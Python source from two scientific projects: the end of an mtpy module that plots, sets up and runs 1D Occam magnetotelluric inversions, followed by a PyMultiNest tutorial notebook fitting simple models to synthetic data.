self.axm.set_ylim(ymin=max(self.depth_limits),
ymax=min(self.depth_limits))
if self.depth_scale == 'log':
self.axm.set_yscale('log')
self.axm.set_ylabel('Depth ({0})'.format(self.depth_units),
fontdict={'size':self.font_size,'weight':'bold'})
self.axm.set_xlabel('Resistivity ($\Omega \cdot m$)',
fontdict={'size':self.font_size,'weight':'bold'})
self.axm.grid(True, which='both', alpha=.25)
plt.show()
def redraw_plot(self):
"""
redraw plot if parameters were changed
use this function if you updated some attributes and want to re-plot.
:Example: ::
>>> # change the color and marker of the xy components
>>> import mtpy.modeling.occam2d as occam2d
>>> ocd = occam2d.Occam2DData(r"/home/occam2d/Data.dat")
>>> p1 = ocd.plotAllResponses()
>>> #change line width
>>> p1.lw = 2
>>> p1.redraw_plot()
"""
plt.close(self.fig)
self.plot()
def update_plot(self, fig):
"""
update any parameters that where changed using the built-in draw from
canvas.
Use this if you change an of the .fig or axes properties
:Example: ::
>>> # to change the grid lines to only be on the major ticks
>>> import mtpy.modeling.occam2d as occam2d
>>> dfn = r"/home/occam2d/Inv1/data.dat"
>>> ocd = occam2d.Occam2DData(dfn)
>>> ps1 = ocd.plotAllResponses()
>>> [ax.grid(True, which='major') for ax in [ps1.axrte,ps1.axtep]]
>>> ps1.update_plot()
"""
fig.canvas.draw()
def save_figure(self, save_fn, file_format='pdf', orientation='portrait',
fig_dpi=None, close_plot='y'):
"""
save_plot will save the figure to save_fn.
Arguments:
-----------
**save_fn** : string
full path to save figure to, can be input as
* directory path -> the directory path to save to
in which the file will be saved as
save_fn/station_name_PhaseTensor.file_format
* full path -> file will be save to the given
path. If you use this option then the format
will be assumed to be provided by the path
**file_format** : [ pdf | eps | jpg | png | svg ]
file type of saved figure pdf,svg,eps...
**orientation** : [ landscape | portrait ]
orientation in which the file will be saved
*default* is portrait
**fig_dpi** : int
The resolution in dots-per-inch the file will be
saved. If None then the dpi will be that at
which the figure was made. I don't think that
it can be larger than dpi of the figure.
**close_plot** : [ y | n ]
* 'y' will close the plot after saving.
* 'n' will leave plot open
:Example: ::
>>> # to save plot as jpg
>>> import mtpy.modeling.occam2d as occam2d
>>> dfn = r"/home/occam2d/Inv1/data.dat"
>>> ocd = occam2d.Occam2DData(dfn)
>>> ps1 = ocd.plotPseudoSection()
>>> ps1.save_plot(r'/home/MT/figures', file_format='jpg')
"""
if fig_dpi == None:
fig_dpi = self.fig_dpi
if os.path.isdir(save_fn) == False:
file_format = save_fn[-3:]
self.fig.savefig(save_fn, dpi=fig_dpi, format=file_format,
orientation=orientation, bbox_inches='tight')
else:
save_fn = os.path.join(save_fn, 'Occam1d.'+
file_format)
self.fig.savefig(save_fn, dpi=fig_dpi, format=file_format,
orientation=orientation, bbox_inches='tight')
if close_plot == 'y':
plt.clf()
plt.close(self.fig)
else:
pass
self.fig_fn = save_fn
print 'Saved figure to: '+self.fig_fn
def __str__(self):
"""
rewrite the string builtin to give a useful message
"""
return ("Plots model responses and model for 1D occam inversion")
class Run(object):
"""
run occam 1d from python given the correct files and location of occam1d
executable
"""
def __init__(self, startup_fn=None, occam_path=None, **kwargs):
self.startup_fn = startup_fn
self.occam_path = occam_path
self.mode = kwargs.pop('mode', 'TE')
self.run_occam1d()
def run_occam1d(self):
if self.startup_fn is None:
raise IOError('Need to input startup file')
if self.occam_path is None:
raise IOError('Need to input path to occam1d executable')
os.chdir(os.path.dirname(self.startup_fn))
test = subprocess.call([self.occam_path,
os.path.basename(self.startup_fn),
self.mode])
if test == 0:
print '=========== Ran Inversion =========='
print ' check {0} for files'.format(os.path.dirname(self.startup_fn))
class PlotL2():
"""
plot L2 curve of iteration vs rms and roughness
Arguments:
----------
**rms_arr** : structured array with keys:
* 'iteration' --> for iteration number (int)
* 'rms' --> for rms (float)
* 'roughness' --> for roughness (float)
======================= ===================================================
Keywords/attributes Description
======================= ===================================================
ax1 matplotlib.axes instance for rms vs iteration
ax2 matplotlib.axes instance for roughness vs rms
fig matplotlib.figure instance
fig_dpi resolution of figure in dots-per-inch
fig_num number of figure instance
fig_size size of figure in inches (width, height)
font_size size of axes tick labels, axes labels is +2
plot_yn [ 'y' | 'n']
'y' --> to plot on instantiation
'n' --> to not plot on instantiation
rms_arr structure np.array as described above
rms_color color of rms marker and line
rms_lw line width of rms line
rms_marker marker for rms values
rms_marker_size size of marker for rms values
rms_mean_color color of mean line
rms_median_color color of median line
rough_color color of roughness line and marker
rough_font_size font size for iteration number inside roughness
marker
rough_lw line width for roughness line
rough_marker marker for roughness
rough_marker_size size of marker for roughness
subplot_bottom subplot spacing from bottom
subplot_left subplot spacing from left
subplot_right subplot spacing from right
subplot_top subplot spacing from top
======================= ===================================================
=================== =======================================================
Methods Description
=================== =======================================================
plot plots L2 curve.
redraw_plot call redraw_plot to redraw the figures,
if one of the attributes has been changed
save_figure saves the matplotlib.figure instance to desired
location and format
=================== ======================================================
"""
def __init__(self, dir_path, model_fn, **kwargs):
self.dir_path = dir_path
self.model_fn = model_fn
self._get_iter_list()
self.subplot_right = .98
self.subplot_left = .085
self.subplot_top = .91
self.subplot_bottom = .1
self.fig_num = kwargs.pop('fig_num', 1)
self.fig_size = kwargs.pop('fig_size', [6, 6])
self.fig_dpi = kwargs.pop('dpi', 300)
self.font_size = kwargs.pop('font_size', 8)
self.rms_lw = kwargs.pop('rms_lw', 1)
self.rms_marker = kwargs.pop('rms_marker', 'd')
self.rms_color = kwargs.pop('rms_color', 'k')
self.rms_marker_size = kwargs.pop('rms_marker_size', 5)
self.rms_median_color = kwargs.pop('rms_median_color', 'red')
self.rms_mean_color = kwargs.pop('rms_mean_color', 'orange')
self.rough_lw = kwargs.pop('rough_lw', .75)
self.rough_marker = kwargs.pop('rough_marker', 'o')
self.rough_color = kwargs.pop('rough_color', 'b')
self.rough_marker_size = kwargs.pop('rough_marker_size', 7)
self.rough_font_size = kwargs.pop('rough_font_size', 6)
self.plot_yn = kwargs.pop('plot_yn', 'y')
if self.plot_yn == 'y':
self.plot()
def _get_iter_list(self):
"""
get all iteration files in dir_path
"""
if os.path.isdir(self.dir_path) == False:
raise IOError('Could not find {0}'.format(self.dir_path))
iter_list = [os.path.join(self.dir_path, fn)
for fn in os.listdir(self.dir_path)
if fn.find('.iter')>0]
self.rms_arr = np.zeros(len(iter_list),
dtype=np.dtype([('iteration', np.int),
('rms', np.float),
('roughness', np.float)]))
for ii, fn in enumerate(iter_list):
m1 = Model()
m1.read_iter_file(fn, self.model_fn)
self.rms_arr[ii]['iteration'] = int(m1.itdict['Iteration'])
self.rms_arr[ii]['rms'] = float(m1.itdict['Misfit Value'])
self.rms_arr[ii]['roughness'] = float(m1.itdict['Roughness Value'])
self.rms_arr.sort(order='iteration')
def plot(self):
"""
plot L2 curve
"""
nr = self.rms_arr.shape[0]
med_rms = np.median(self.rms_arr['rms'])
mean_rms = np.mean(self.rms_arr['rms'])
#set the dimesions of the figure
plt.rcParams['font.size'] = self.font_size
plt.rcParams['figure.subplot.left'] = self.subplot_left
plt.rcParams['figure.subplot.right'] = self.subplot_right
plt.rcParams['figure.subplot.bottom'] = self.subplot_bottom
plt.rcParams['figure.subplot.top'] = self.subplot_top
#make figure instance
self.fig = plt.figure(self.fig_num,self.fig_size, dpi=self.fig_dpi)
plt.clf()
#make a subplot for RMS vs Iteration
self.ax1 = self.fig.add_subplot(1, 1, 1)
#plot the rms vs iteration
l1, = self.ax1.plot(self.rms_arr['iteration'],
self.rms_arr['rms'],
'-k',
lw=1,
marker='d',
ms=5)
#plot the median of the RMS
m1, = self.ax1.plot(self.rms_arr['iteration'],
np.repeat(med_rms, nr),
ls='--',
color=self.rms_median_color,
lw=self.rms_lw*.75)
#plot the mean of the RMS
m2, = self.ax1.plot(self.rms_arr['iteration'],
np.repeat(mean_rms, nr),
ls='--',
color=self.rms_mean_color,
lw=self.rms_lw*.75)
#make subplot for RMS vs Roughness Plot
self.ax2 = self.ax1.twiny()
self.ax2.set_xlim(self.rms_arr['roughness'][1:].min(),
self.rms_arr['roughness'][1:].max())
self.ax1.set_ylim(0, self.rms_arr['rms'][1])
#plot the rms vs roughness
l2, = self.ax2.plot(self.rms_arr['roughness'],
self.rms_arr['rms'],
ls='--',
color=self.rough_color,
lw=self.rough_lw,
marker=self.rough_marker,
ms=self.rough_marker_size,
mfc='white')
#plot the iteration number inside the roughness marker
for rms, ii, rough in zip(self.rms_arr['rms'], self.rms_arr['iteration'],
self.rms_arr['roughness']):
#need this because if the roughness is larger than this number
#matplotlib puts the text out of bounds and a draw_text_image
#error is raised and file cannot be saved, also the other
#numbers are not put in.
if rough > 1e8:
pass
else:
self.ax2.text(rough,
rms,
'{0}'.format(ii),
horizontalalignment='center',
verticalalignment='center',
fontdict={'size':self.rough_font_size,
'weight':'bold',
'color':self.rough_color})
#make a legend
self.ax1.legend([l1, l2, m1, m2],
['RMS', 'Roughness',
'Median_RMS={0:.2f}'.format(med_rms),
'Mean_RMS={0:.2f}'.format(mean_rms)],
ncol=1,
loc='upper right',
columnspacing=.25,
markerscale=.75,
handletextpad=.15)
#set the axis properties for RMS vs iteration
self.ax1.yaxis.set_minor_locator(MultipleLocator(.1))
self.ax1.xaxis.set_minor_locator(MultipleLocator(1))
self.ax1.set_ylabel('RMS',
fontdict={'size':self.font_size+2,
'weight':'bold'})
self.ax1.set_xlabel('Iteration',
fontdict={'size':self.font_size+2,
'weight':'bold'})
self.ax1.grid(alpha=.25, which='both', lw=self.rough_lw)
self.ax2.set_xlabel('Roughness',
fontdict={'size':self.font_size+2,
'weight':'bold',
'color':self.rough_color})
for t2 in self.ax2.get_xticklabels():
t2.set_color(self.rough_color)
plt.show()
def redraw_plot(self):
"""
redraw plot if parameters were changed
use this function if you updated some attributes and want to re-plot.
:Example: ::
>>> # change the color and marker of the xy components
>>> import mtpy.modeling.occam2d as occam2d
>>> ocd = occam2d.Occam2DData(r"/home/occam2d/Data.dat")
>>> p1 = ocd.plotAllResponses()
>>> #change line width
>>> p1.lw = 2
>>> p1.redraw_plot()
"""
plt.close(self.fig)
self.plot()
def save_figure(self, save_fn, file_format='pdf', orientation='portrait',
fig_dpi=None, close_fig='y'):
"""
save_plot will save the figure to save_fn.
Arguments:
-----------
**save_fn** : string
full path to save figure to, can be input as
* directory path -> the directory path to save to
in which the file will be saved as
save_fn/station_name_PhaseTensor.file_format
* full path -> file will be save to the given
path. If you use this option then the format
will be assumed to be provided by the path
**file_format** : [ pdf | eps | jpg | png | svg ]
file type of saved figure pdf,svg,eps...
**orientation** : [ landscape | portrait ]
orientation in which the file will be saved
*default* is portrait
**fig_dpi** : int
The resolution in dots-per-inch the file will be
saved. If None then the dpi will be that at
which the figure was made. I don't think that
it can be larger than dpi of the figure.
**close_plot** : [ y | n ]
* 'y' will close the plot after saving.
* 'n' will leave plot open
:Example: ::
>>> # to save plot as jpg
>>> import mtpy.modeling.occam2d as occam2d
>>> dfn = r"/home/occam2d/Inv1/data.dat"
>>> ocd = occam2d.Occam2DData(dfn)
>>> ps1 = ocd.plotPseudoSection()
>>> ps1.save_plot(r'/home/MT/figures', file_format='jpg')
"""
if fig_dpi == None:
fig_dpi = self.fig_dpi
if os.path.isdir(save_fn) == False:
file_format = save_fn[-3:]
self.fig.savefig(save_fn, dpi=fig_dpi, format=file_format,
orientation=orientation, bbox_inches='tight')
else:
save_fn = os.path.join(save_fn, '_L2.'+
file_format)
self.fig.savefig(save_fn, dpi=fig_dpi, format=file_format,
orientation=orientation, bbox_inches='tight')
if close_fig == 'y':
plt.clf()
plt.close(self.fig)
else:
pass
self.fig_fn = save_fn
print 'Saved figure to: '+self.fig_fn
def update_plot(self):
"""
update any parameters that where changed using the built-in draw from
canvas.
Use this if you change an of the .fig or axes properties
:Example: ::
>>> # to change the grid lines to only be on the major ticks
>>> import mtpy.modeling.occam2d as occam2d
>>> dfn = r"/home/occam2d/Inv1/data.dat"
>>> ocd = occam2d.Occam2DData(dfn)
>>> ps1 = ocd.plotAllResponses()
>>> [ax.grid(True, which='major') for ax in [ps1.axrte,ps1.axtep]]
>>> ps1.update_plot()
"""
self.fig.canvas.draw()
def __str__(self):
"""
rewrite the string builtin to give a useful message
"""
return ("Plots RMS vs Iteration computed by Occam2D")
def parse_arguments(arguments):
"""
takes list of command line arguments obtained by passing in sys.argv
reads these and returns a parser object
author: Alison Kirkby (2016)
"""
import argparse
parser = argparse.ArgumentParser(description = 'Set up and run a set of isotropic occam1d model runs')
parser.add_argument('edipath',
help='folder containing edi files to use, full path or relative to working directory',
type=str)
parser.add_argument('-l','--program_location',
help='path to the inversion program',
type=str,default=r'/home/547/alk547/occam1d/OCCAM1DCSEM')
parser.add_argument('-efr','--resistivity_errorfloor',
help='error floor in resistivity, percent',
type=float,default=0)
parser.add_argument('-efp','--phase_errorfloor',
help='error floor in phase, degrees',
type=float,default=0)
parser.add_argument('-efz','--z_errorfloor',
help='error floor in z, percent',
type=float,default=0)
parser.add_argument('-wd','--working_directory',
help='working directory',
type=str,default='.')
parser.add_argument('-m','--modes', nargs='*',
help='modes to run, any or all of TE, TM, det (determinant)',
type=str,default=['TE'])
parser.add_argument('-r','--rotation_angle',
help='angle to rotate the data by, in degrees or can define option "strike" to rotate to strike, or "file" to get rotation angle from file',
type=str,default='0')
parser.add_argument('-rfile','--rotation_angle_file',
help='file containing rotation angles, first column is station name (must match edis) second column is rotation angle',
type=str,default=None)
parser.add_argument('-spr','--strike_period_range',nargs=2,
help='period range to use for calculation of strike if rotating to strike, two floats',
type=float,default=[1e-3,1e3])
parser.add_argument('-sapp','--strike_approx',
help='approximate strike angle, the strike closest to this value is chosen',
type=float,default=0.)
parser.add_argument('-q','--remove_outofquadrant',
help='whether or not to remove points outside of the first or third quadrant, True or False',
type=bool,default=True)
parser.add_argument('-itermax','--iteration_max',
help='maximum number of iterations',
type=int,default=100)
parser.add_argument('-rf','--rms_factor',
help='factor to multiply the minimum possible rms by to get the target rms for the second run',
type=float,default=1.05)
parser.add_argument('-nl','--n_layers',
help='number of layers in the inversion',
type=int,default=80)
parser.add_argument('-s','--master_savepath',
help = 'master directory to save suite of runs into',
default = 'inversion_suite')
args = parser.parse_args(arguments)
args.working_directory = os.path.abspath(args.working_directory)
if args.rotation_angle not in ['file','strike']:
try:
args.rotation_angle = float(args.rotation_angle)
except:
args.rotation_angle = 0.
return args
def update_inputs():
"""
update input parameters from command line
author: Alison Kirkby (2016)
"""
from sys import argv
args = parse_arguments(argv[1:])
cline_inputs = {}
cline_keys = [i for i in dir(args) if i[0] != '_']
for key in cline_keys:
cline_inputs[key] = getattr(args,key)
return cline_inputs
def get_strike(edi_object,fmin,fmax,strike_approx = 0):
"""
get the strike from the z array, choosing the strike angle that is closest
to the azimuth of the PT ellipse (PT strike).
if there is not strike available from the z array use the PT strike.
"""
fselect = (edi_object.freq > fmin) & (edi_object.freq < fmax)
# get median strike angles for frequencies needed (two strike angles due to 90 degree ambiguity)
zstrike = mtg.strike_angle(z_object=edi_object.Z)[fselect]
# put both strikes in the same quadrant for averaging
zstrike = zstrike % 90
zstrike = np.median(zstrike[np.isfinite(zstrike[:,0])],axis=0)
# add 90 to put one back in the other quadrant
zstrike[1] += 90
# choose closest value to approx_strike
zstrike = zstrike[np.abs(zstrike-strike_approx) - np.amin(np.abs(zstrike-strike_approx)) < 1e-3]
if len(zstrike) > 0:
strike = zstrike[0]
else:
# if the data are 1d set strike to 90 degrees (i.e. no rotation)
strike = 90.
return strike
def generate_inputfiles(**input_parameters):
"""
generate all the input files to run occam1d, return the path and the
startup files to run.
author: Alison Kirkby (2016)
"""
edipath = op.join(input_parameters['working_directory'],input_parameters['edipath'])
edilist = [ff for ff in os.listdir(edipath) if ff.endswith('.edi')]
wkdir_master = op.join(input_parameters['working_directory'],
input_parameters['master_savepath'])
if not os.path.exists(wkdir_master):
os.mkdir(wkdir_master)
rundirs = {}
for edifile in edilist:
# read the edi file to get the station name
eo = mtedi.Edi(op.join(edipath,edifile))
print input_parameters['rotation_angle'],input_parameters['working_directory'],input_parameters['rotation_angle_file']
if input_parameters['rotation_angle'] == 'strike':
spr = input_parameters['strike_period_range']
fmax,fmin = [1./np.amin(spr),1./np.amax(spr)]
rotangle = (get_strike(eo,fmin,fmax,
strike_approx = input_parameters['strike_approx']) - 90.) % 180
elif input_parameters['rotation_angle'] == 'file':
with open(op.join(input_parameters['working_directory'],input_parameters['rotation_angle_file'])) as f:
line = f.readline().strip().split()
print line,eo.station
while string.upper(line[0]) != string.upper(eo.station):
line = f.readline().strip().split()
if len(line) == 0:
line = ['','0.0']
break
rotangle = float(line[1])
else:
rotangle = input_parameters['rotation_angle']
print "rotation angle",rotangle
# create a working directory to store the inversion files in
svpath = 'station'+eo.station
wd = op.join(wkdir_master,svpath)
if not os.path.exists(wd):
os.mkdir(wd)
rundirs[svpath] = []
# create the model file
ocm = Model(n_layers=input_parameters['n_layers'],save_path=wd)
ocm.write_model_file()
for mode in input_parameters['modes']:
# create a data file for each mode
ocd = Data()
ocd._data_fn = 'Occam1d_DataFile_rot%03i'%rotangle
ocd.write_data_file(
res_errorfloor=input_parameters['resistivity_errorfloor'],
phase_errorfloor=input_parameters['phase_errorfloor'],
z_errorfloor=input_parameters['z_errorfloor'],
remove_outofquadrant=input_parameters['remove_outofquadrant'],
mode=mode,
edi_file = op.join(edipath,edifile),
thetar=rotangle,
save_path = wd)
ocs = Startup(data_fn = ocd.data_fn,
model_fn = ocm.model_fn)
startup_fn = 'OccamStartup1D'+mode
ocs.write_startup_file(save_path=wd,
startup_fn=op.join(wd,startup_fn),
max_iter=input_parameters['iteration_max'],
target_rms=0.)
rundirs[svpath].append(startup_fn)
return wkdir_master,rundirs
def divide_inputs(work_to_do,size):
"""
divide list of inputs into chunks to send to each processor
"""
chunks = [[] for _ in range(size)]
for i,d in enumerate(work_to_do):
chunks[i%size].append(d)
return chunks
def build_run():
"""
build input files and run a suite of models in series (pretty quick so won't bother parallelise)
run Occam1d on each set of inputs.
Occam is run twice. First to get the lowest possible misfit.
we then set the target rms to a factor (default 1.05) times the minimum rms achieved
and run to get the smoothest model.
author: Alison Kirkby (2016)
"""
#from mpi4py import MPI
# get command line arguments as a dictionary
input_parameters = update_inputs()
# create the inputs and get the run directories
master_wkdir, run_directories = generate_inputfiles(**input_parameters)
# run Occam1d on each set of inputs.
# Occam is run twice. First to get the lowest possible misfit.
# we then set the target rms to a factor (default 1.05) times the minimum rms achieved
# and run to get the smoothest model.
for rundir in run_directories.keys():
wd = op.join(master_wkdir,rundir)
os.chdir(wd)
for startupfile in run_directories[rundir]:
# define some parameters
mode = startupfile[14:]
iterstring = 'RMSmin'+ mode
# run for minimum rms
subprocess.call([input_parameters['program_location'],
startupfile,
iterstring])
# read the iter file to get minimum rms
iterfile = max([ff for ff in os.listdir(wd) if (ff.startswith(iterstring) and ff.endswith('.iter'))])
startup = Startup()
startup.read_startup_file(op.join(wd,iterfile))
# create a new startup file the same as the previous one but target rms is factor*minimum_rms
startupnew = Startup(data_fn=op.join(wd,startup.data_file),
model_fn=op.join(wd,startup.model_file),
max_iter=input_parameters['iteration_max'],
target_rms=float(startup.misfit_value)*input_parameters['rms_factor'])
startupnew.write_startup_file(startup_fn=op.join(wd,startupfile),save_path=wd)
# run occam again
subprocess.call([input_parameters['program_location'],
startupfile,
'Smooth' + mode])
if __name__ == '__main__':
build_run()
| gpl-3.0 |
exowanderer/Charge-Carrier-Trapping-Comparison | PyMultiNest Learning Tutorial.py | 1 | 48066 |
# coding: utf-8
# # PyMultiNest My Models
# In[ ]:
from __future__ import absolute_import, unicode_literals, print_function
import pymultinest
import math
import os
import threading, subprocess
from sys import platform
from pylab import *;ion()
if not os.path.exists("chains"): os.mkdir("chains")
# ** Straight Line **
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1D(cube):
# cube = np.float32(cube)
return lambda y: np.exp(-0.5*(( (cube[0] - y) / cube[1])**2)) / sqrt(2*pi*cube[1]**2)
def straight_line(cube):
offset = cube[0]
slope = cube[1]
return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
amp = cube[0]
period = cube[1]
return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(42)
param0= 0.5#0.05
param1= 0.9#5*pi
yunc = 0.1
nPts = int(50)
nThPts= int(1e3)
xmin = -1#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
model = straight_line; parameters = ["offset", "slope"]
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.random.uniform(xmin, xmax, nPts)
xdata = sort(xdata)
ydata = model([param0,param1])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0,param1])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# If you want to "mess up" the model (for model comparison),
# then uncomment here a *different* model than above
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
# assumes a uniform(0,1) prior in nparams-space
pass
def myloglike(cube, ndim, nparams):
# Normal Log Likelihood
modelNow = model(cube)(xdata)
return -0.5*((modelNow - ydata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('true\t', [param0, param1])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
# figure(figsize=(10,10))
# plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# plot(thdata, model([param0,param1])(thdata))
figure(figsize=(10,10))
# plot(thdata, model([param0a,param1a])(thdata) + model([param0b,param1b])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
modelAll = modelAll + model(m['mean'])(thdata)
plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# ** Sine Wave **
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1D(cube):
# cube = np.float32(cube)
return lambda y: np.exp(-0.5*(( (cube[0] - y) / cube[1])**2)) / sqrt(2*pi*cube[1]**2)
def straight_line(cube):
offset = cube[0]
slope = cube[1]
return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
amp = cube[0]
period = cube[1]
return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(42)
param0= 0.5#0.05
param1= 0.9#5*pi
yunc = 0.1
nPts = int(50)
nThPts= int(1e3)
xmin = -1#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
model = sine_wave; parameters = ["amp", "period"]
# model = straight_line; parameters = ["offset", "slope"]
# model = gaussian1D; parameters = ["center", "width"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.random.uniform(xmin, xmax, nPts)
xdata = sort(xdata)
ydata = model([param0,param1])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0,param1])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# If you want to "mess up" the model (for model comparison),
# then uncomment here a *different* model than above
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
# assumes a uniform(0,1) prior in nparams-space
pass
def myloglike(cube, ndim, nparams):
# Normal Log Likelihood
modelNow = model(cube)(xdata)
return -0.5*((modelNow - ydata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
